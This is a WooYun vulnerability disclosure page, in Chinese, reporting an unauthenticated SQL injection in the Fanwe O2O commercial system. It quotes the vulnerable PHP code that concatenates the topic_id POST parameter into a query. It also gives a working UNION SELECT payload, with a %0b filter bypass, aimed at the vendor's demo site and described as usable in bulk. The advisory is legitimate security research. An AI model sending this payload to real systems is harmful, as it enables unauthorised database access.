当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122585

漏洞标题:方维O2O商业系统SQL注入5(demo验证直接回显)

相关厂商:fanwe.com

漏洞作者: story

提交时间:2015-06-25 11:38

修复时间:2015-09-28 11:40

公开时间:2015-09-28 11:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-30: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开

简要描述:

带一波通用型节奏。UNION SELECT注入,直接显示结果,无需登录,demo验证,可批量。

详细说明:

/app/Lib/main/ajaxModule.class.php

public function load_topic_reply_list(){
		global_run();
		if($GLOBALS['user_info']){
			$GLOBALS['tmpl']->assign("user_info",$GLOBALS['user_info']);
		}
		$topic_id = $_POST['topic_id'];
		require_once APP_ROOT_PATH.'system/model/topic.php';
		require_once APP_ROOT_PATH."app/Lib/page.php";
		//分页
		$page_size = 5;
		$page = intval($_REQUEST['p']);
		if($page==0)
			$page = 1;
		$limit = (($page-1)*$page_size).",".$page_size;
		
		$reply_list = get_topic_reply_list($topic_id,$limit);


从post中获取topic_id($topic_id = $_POST['topic_id'];),传入get_topic_reply_list函数。
跟进:

function get_topic_reply_list($topic_id,$limit){
	$sql = "SELECT id,topic_id,user_id,user_name,content,create_time,reply_id,reply_user_id,reply_user_name from ".DB_PREFIX."topic_reply where is_effect=1 and is_delete=0 and topic_id=".$topic_id." order by id desc limit ".$limit;
	$data = $GLOBALS['db']->getAll($sql);
	foreach($data as $k=>$v){
		$data[$k]['format_create_time'] = to_date($v['create_time'],"Y-m-d H:i");
	}
	return $data;
}


直接带入SQL语句。
demo验证:

QQ20150624-5@2x.png


POST数据包:
http://o2odemo.fanwe.net/index.php?ctl=ajax&act=load_topic_reply_list
topic_id=-1 union select%0b1,2,3,user(),5,6,7,8,9%23
测试代码中写了个验证脚本,效果如图:

QQ20150624-6@2x.png

漏洞证明:

QQ20150624-6@2x.png

修复方案:

过滤。

版权声明:转载请注明来源 story@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-28 11:40

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

2015-06-30:正在处理

漏洞评价:

评论